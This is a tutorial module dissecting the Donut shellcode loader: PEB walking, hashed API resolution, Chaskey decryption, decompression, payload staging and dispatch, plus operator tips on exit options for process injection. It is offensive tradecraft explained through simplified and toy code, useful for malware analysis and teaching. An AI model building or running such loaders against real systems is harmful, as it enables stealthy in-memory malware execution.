Module 5: The Donut Loader
Inside the position-independent shellcode loader: PEB walking, API resolution, decryption, decompression, and module-type dispatch.
Module Objective
Trace the complete execution flow of Donut’s PIC loader from the moment shellcode begins executing. Understand how it finds its own data via RIP-relative addressing, resolves Windows APIs by walking the PEB and hashing export names, decrypts the instance and module, and dispatches to the correct payload handler.
1. Position-Independent Code Constraints
Donut’s loader must execute from any address in memory with zero external dependencies at startup. This means:
- No global variables: all state is on the stack or in the DONUT_INSTANCE structure
- No import table: every API must be resolved at runtime via PEB walking
- No absolute addresses: all data references use offsets from the current instruction pointer
- No string literals in the conventional sense: API names are stored as hashes, not plaintext
The loader is written in C and compiled with special flags to produce PIC output. The Donut build system compiles loader.c and its dependencies into a raw code blob that is position-independent.
2. Loader Entry Point
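When the shellcode begins executing, the loader's first task is to find the DONUT_INSTANCE structure that follows the code. Because the loader cannot know its load address in advance, it derives the instance pointer from its own current location: RIP-relative addressing on x64, and a call/pop sequence on x86.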
// The loader entry point in loader.c
// On x64, we can use RIP-relative addressing
// The DONUT_INSTANCE is appended immediately after the loader code
// Step 1: Determine our base address
// The instance offset is embedded as a constant during generation
PDONUT_INSTANCE inst = (PDONUT_INSTANCE)(
    (BYTE*)_ReturnAddress() + instance_offset
);
// On x86, a call/pop trick is used:
//   call $+5          ; push next instruction address
//   pop  eax          ; eax = current EIP
//   add  eax, offset  ; eax = address of DONUT_INSTANCE
Once the loader has a pointer to DONUT_INSTANCE, it has access to all configuration data, API hashes, and encryption keys.
3. PEB Walking for API Resolution
The core of PIC programming: finding loaded DLLs and their exports without calling any APIs. The Process Environment Block (PEB) contains a linked list of all loaded modules.
// peb.c - Walk the PEB to find loaded DLLs and resolve exports
// Step 1: Access the PEB via the TEB
// x64: PEB is at gs:[0x60]
// x86: PEB is at fs:[0x30]
#if defined(_WIN64)
    PPEB peb = (PPEB)__readgsqword(0x60);
#else
    PPEB peb = (PPEB)__readfsdword(0x30);
#endif
// Step 2: Get the loader data (list of loaded modules)
PPEB_LDR_DATA ldr = peb->Ldr;
// Step 3: Walk the InMemoryOrderModuleList
// This doubly-linked list contains every loaded DLL
PLIST_ENTRY head = &ldr->InMemoryOrderModuleList;
PLIST_ENTRY entry = head->Flink;
while (entry != head) {
    PLDR_DATA_TABLE_ENTRY mod = CONTAINING_RECORD(
        entry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks
    );
    // mod->BaseDllName is the DLL name (e.g., "kernel32.dll")
    // mod->DllBase is the base address of the loaded DLL
    // Now we can parse this DLL's export table...
    entry = entry->Flink;
}
PEB Walking Chain (diagram): gs:[0x60] on x64 or fs:[0x30] on x86 → Process Environment Block → loader data → linked list of DLLs → function addresses
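The list walk above relies on two ideas that are easy to study in isolation: a circular doubly-linked list whose head is a sentinel, and recovering the containing structure from an embedded link field. The following is a minimal portable sketch of those two ideas only. The types `list_entry` and `module_entry`, the macro `CONTAINER_OF`, and the helper functions are hypothetical stand-ins for `LIST_ENTRY`, `LDR_DATA_TABLE_ENTRY`, and `CONTAINING_RECORD`; it does not touch the real PEB.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for LIST_ENTRY. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Hypothetical stand-in for LDR_DATA_TABLE_ENTRY. */
typedef struct module_entry {
    const char *name;   /* plays the role of BaseDllName */
    void       *base;   /* plays the role of DllBase */
    list_entry  links;  /* plays the role of InMemoryOrderLinks */
} module_entry;

/* Same idea as CONTAINING_RECORD: step back from the embedded link
   to the start of the structure that contains it. */
#define CONTAINER_OF(ptr, type, field) \
    ((type *)((char *)(ptr) - offsetof(type, field)))

/* An empty circular list points at itself in both directions. */
static void list_init(list_entry *head) {
    head->flink = head;
    head->blink = head;
}

/* Append a node just before the sentinel head. */
static void list_push_back(list_entry *head, list_entry *node) {
    node->flink = head;
    node->blink = head->blink;
    head->blink->flink = node;
    head->blink = node;
}

/* Walk until the cursor returns to the head; return the matching base. */
static void *find_module(list_entry *head, const char *name) {
    for (list_entry *e = head->flink; e != head; e = e->flink) {
        module_entry *m = CONTAINER_OF(e, module_entry, links);
        if (strcmp(m->name, name) == 0) {
            return m->base;
        }
    }
    return NULL;
}
```

The loop terminates when the cursor returns to the head, which is why the head itself is never interpreted as a module entry. The real module names are counted UTF-16 strings, so a real comparison would not be a plain `strcmp`.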
4. Hash-Based Export Resolution
For each loaded DLL, the loader walks its Export Address Table (EAT) and computes a hash of each exported function name. When a hash matches one in the DONUT_INSTANCE.hash[] array, the function address is stored in the api structure.
// Resolve exports from a DLL by hashing function names
VOID ResolveAPIs(PDONUT_INSTANCE inst, HMODULE dll) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)dll;
    PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE*)dll + dos->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(
        (BYTE*)dll + nt->OptionalHeader
            .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
    );
    // All three arrays hold RVAs or indices relative to the DLL base
    DWORD *names    = (DWORD*)((BYTE*)dll + exp->AddressOfNames);
    WORD  *ordinals = (WORD*) ((BYTE*)dll + exp->AddressOfNameOrdinals);
    DWORD *funcs    = (DWORD*)((BYTE*)dll + exp->AddressOfFunctions);
    for (DWORD i = 0; i < exp->NumberOfNames; i++) {
        char *name = (char*)((BYTE*)dll + names[i]);
        // Compute hash of this export name
        // (ComputeHash is simplified here; the hash described below
        // also mixes in the DLL name)
        ULONGLONG hash = ComputeHash(name);
        // Check against all hashes in the instance
        for (DWORD j = 0; j < DONUT_MAX_API; j++) {
            if (inst->hash[j] == hash) {
                // Found a match! Store the resolved address
                // names[i] pairs with ordinals[i], which indexes funcs[]
                WORD ord = ordinals[i];
                FARPROC addr = (FARPROC)((BYTE*)dll + funcs[ord]);
                ((FARPROC*)&inst->api)[j] = addr;
            }
        }
    }
}
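The step that most often trips readers up is the indirection between the three export arrays: the i-th name does not map to the i-th function, it maps through the i-th entry of the name-ordinal array. A minimal sketch of that lookup over a mock table, assuming a hypothetical `mock_exports` structure and `lookup_rva` helper (neither exists in Donut or the Windows SDK), might look like this:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical in-memory model of the three parallel export arrays. */
typedef struct mock_exports {
    const char    **names;     /* like AddressOfNames, already as strings */
    const uint16_t *ordinals;  /* like AddressOfNameOrdinals */
    const uint32_t *funcs;     /* like AddressOfFunctions (RVAs) */
    uint32_t        num_names;
    uint32_t        num_funcs;
} mock_exports;

/* Return the RVA for an exported name, or 0 if it is absent or the
   table is inconsistent. */
static uint32_t lookup_rva(const mock_exports *e, const char *wanted) {
    for (uint32_t i = 0; i < e->num_names; i++) {
        if (strcmp(e->names[i], wanted) != 0) {
            continue;
        }
        /* names[i] pairs with ordinals[i]; that value indexes funcs[]. */
        uint16_t idx = e->ordinals[i];
        if (idx >= e->num_funcs) {
            return 0; /* malformed table: index out of range */
        }
        return e->funcs[idx];
    }
    return 0;
}
```

With names `{"Alpha", "Beta", "Gamma"}`, ordinals `{2, 0, 1}`, and function RVAs `{0x1000, 0x2000, 0x3000}`, looking up `"Alpha"` yields `0x3000`, not `0x1000`. The bounds check is an addition for the sketch; the walkthrough code above trusts the table.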
The Hashing Algorithm
Donut uses a custom hash function (Maru hash) that combines the DLL name and the function name into a single 64-bit value. Because the DLL name is part of the input, identically named exports in different modules hash differently: kernel32!VirtualAlloc and a hypothetical ntdll!VirtualAlloc would not collide.
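To see why mixing the DLL name into the hash separates identically named exports, here is a small sketch that uses 64-bit FNV-1a as a stand-in. This is not the Maru hash and makes no claim about how Donut combines the two names; `fnv1a64_update` and `toy_api_hash` are hypothetical helper names, and folding the DLL name to lowercase is an assumption made for the example.

```c
#include <assert.h>
#include <stdint.h>

#define FNV64_OFFSET 0xcbf29ce484222325ULL
#define FNV64_PRIME  0x100000001b3ULL

/* Feed a NUL-terminated string into a running FNV-1a state.
   fold_case lowers ASCII letters so "KERNEL32.DLL" and "kernel32.dll"
   contribute the same bytes. */
static uint64_t fnv1a64_update(uint64_t h, const char *s, int fold_case) {
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char)*s;
        if (fold_case && c >= 'A' && c <= 'Z') {
            c = (unsigned char)(c - 'A' + 'a');
        }
        h ^= c;
        h *= FNV64_PRIME;
    }
    return h;
}

/* Hash "dll!func" as one stream: DLL name case-folded, export name not,
   because export names are case-sensitive. */
static uint64_t toy_api_hash(const char *dll, const char *func) {
    uint64_t h = FNV64_OFFSET;
    h = fnv1a64_update(h, dll, 1);
    h = fnv1a64_update(h, "!", 0);
    h = fnv1a64_update(h, func, 0);
    return h;
}
```

Analysts use the same idea in reverse: precomputing a table of hashes for known DLL and export names lets them map constants found in a sample back to API names.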
5. Instance Decryption
After resolving the minimum required APIs, the loader decrypts the DONUT_INSTANCE. The decryption key is derived from a value embedded in the loader code at generation time:
// Decrypt the DONUT_INSTANCE using Chaskey CTR mode
// The initial key and counter are stored in the loader code itself
// CTR mode is symmetric, so the "encrypt" routine also decrypts
chaskey_encrypt(
    inst->key,   // Chaskey key (128-bit)
    inst->ctr,   // Counter/nonce (128-bit)
    (BYTE*)inst + offsetof(DONUT_INSTANCE, /* encrypted start */),
    encrypted_size
);
// Verify integrity via MAC
DWORD mac = ComputeMAC(inst, inst_size);
if (mac != inst->mac) {
    // Decryption failed or data corrupted - abort
    return;
}
Once decrypted, the instance reveals the full API hash table, the module decryption key, bypass configuration, and all other runtime parameters.
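The reason a routine named "encrypt" can decrypt is a general property of counter (CTR) mode: the cipher only generates a keystream, and the data is XORed with it, so applying the same operation twice restores the input. The sketch below demonstrates that property with a deliberately trivial block function. `toy_block` is not Chaskey and is not secure, and `ctr_xor`, the block length, and the big-endian counter increment are all assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BLOCK_LEN 16

/* Toy keyed block function. NOT Chaskey, NOT secure: it exists only
   to produce a deterministic keystream from (key, counter). */
static void toy_block(const uint8_t *key, const uint8_t *in, uint8_t *out) {
    uint8_t acc = 0x5a;
    for (int i = 0; i < BLOCK_LEN; i++) {
        acc = (uint8_t)((acc ^ key[i] ^ in[i]) * 167u + 13u);
        out[i] = acc;
    }
}

/* CTR mode: XOR the data with keystream blocks generated from an
   incrementing counter. The same call encrypts and decrypts. */
static void ctr_xor(const uint8_t *key, const uint8_t *nonce,
                    uint8_t *data, size_t len) {
    uint8_t ctr[BLOCK_LEN];
    uint8_t ks[BLOCK_LEN];
    memcpy(ctr, nonce, BLOCK_LEN);
    while (len > 0) {
        toy_block(key, ctr, ks);
        size_t n = len < BLOCK_LEN ? len : BLOCK_LEN;
        for (size_t i = 0; i < n; i++) {
            data[i] ^= ks[i];
        }
        data += n;
        len -= n;
        /* Increment the counter as a big-endian integer. */
        for (int i = BLOCK_LEN - 1; i >= 0; i--) {
            if (++ctr[i] != 0) {
                break;
            }
        }
    }
}
```

Calling `ctr_xor` once on a buffer scrambles it; calling it again with the same key and nonce restores the original bytes. A separate integrity check, such as the MAC comparison in the walkthrough, is still needed because CTR mode on its own does not detect tampering.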
6. Module Decryption and Decompression
With the instance decrypted and APIs resolved, the loader proceeds to decrypt and decompress the DONUT_MODULE:
// Locate the module (either embedded or downloaded via staging)
PDONUT_MODULE mod;
if (inst->type == DONUT_INSTANCE_EMBED) {
    // Module is embedded after the instance
    mod = (PDONUT_MODULE)((BYTE*)inst + inst->mod_offset);
} else {
    // Download the module via HTTP or DNS staging
    mod = DownloadModule(inst);
}
// Decrypt the module with the module-specific key
chaskey_encrypt(
    inst->mod_key,
    inst->mod_ctr,
    (BYTE*)mod,
    inst->mod_len
);
// Decompress based on the compression engine
LPVOID payload = NULL;
if (mod->compress == DONUT_COMPRESS_APLIB) {
    payload = inst->api.VirtualAlloc(NULL, mod->len, MEM_COMMIT, PAGE_READWRITE);
    aP_depack(mod->data, payload);
} else if (mod->compress == DONUT_COMPRESS_LZNT1) {
    payload = inst->api.VirtualAlloc(NULL, mod->len, MEM_COMMIT, PAGE_READWRITE);
    ULONG final_size;
    inst->api.RtlDecompressBuffer(
        COMPRESSION_FORMAT_LZNT1,
        payload, mod->len,
        mod->data, mod->zlen,
        &final_size
    );
} else {
    // No compression: data is the raw payload
    payload = mod->data;
}
7. Module-Type Dispatch
After decryption and decompression, the loader checks the module type and calls the appropriate handler:
// Dispatch based on module type
switch (mod->type) {
    case DONUT_MODULE_NET_DLL:
    case DONUT_MODULE_NET_EXE:
        // .NET payload: host CLR, load assembly, invoke
        RunDotNET(inst, mod, payload);
        break;
    case DONUT_MODULE_DLL:
    case DONUT_MODULE_EXE:
        // Native PE: map sections, relocate, resolve imports, execute
        RunPE(inst, mod, payload);
        break;
    case DONUT_MODULE_VBS:
    case DONUT_MODULE_JS:
    case DONUT_MODULE_XSL:
        // Script: create COM scripting engine, execute
        RunScript(inst, mod, payload);
        break;
}
Complete Loader Execution Flow (diagram, stage annotations only): RIP-relative → Resolve APIs → Chaskey → Patch stubs → Chaskey → aPLib/LZNT1 → PE/CLR/COM
8. Exit Handling
After the payload finishes executing, the loader must clean up and exit. The exit behavior is configurable via DONUT_INSTANCE.exit_opt:
| Exit Option | Constant | Behavior |
|---|---|---|
| Exit Thread | DONUT_OPT_EXIT_THREAD | Calls ExitThread(0) — only the current thread terminates |
| Exit Process | DONUT_OPT_EXIT_PROCESS | Calls ExitProcess(0) — the entire process terminates |
| No Exit | DONUT_OPT_EXIT_BLOCK | The loader returns normally, allowing the caller to continue |
Exit Option Matters
Choosing the wrong exit option can crash the target process or leave zombie threads. Exit Thread is safest for injection scenarios (the host process continues). Exit Process is useful for sacrificial processes. No Exit / Block is best when the loader is called from your own code and you want control to return.
Knowledge Check
1. How does the PIC loader find loaded DLLs without calling any Windows APIs?
2. Why does Donut use hash-based API resolution instead of plaintext strings?
3. What is the first thing the Donut loader must do after execution begins?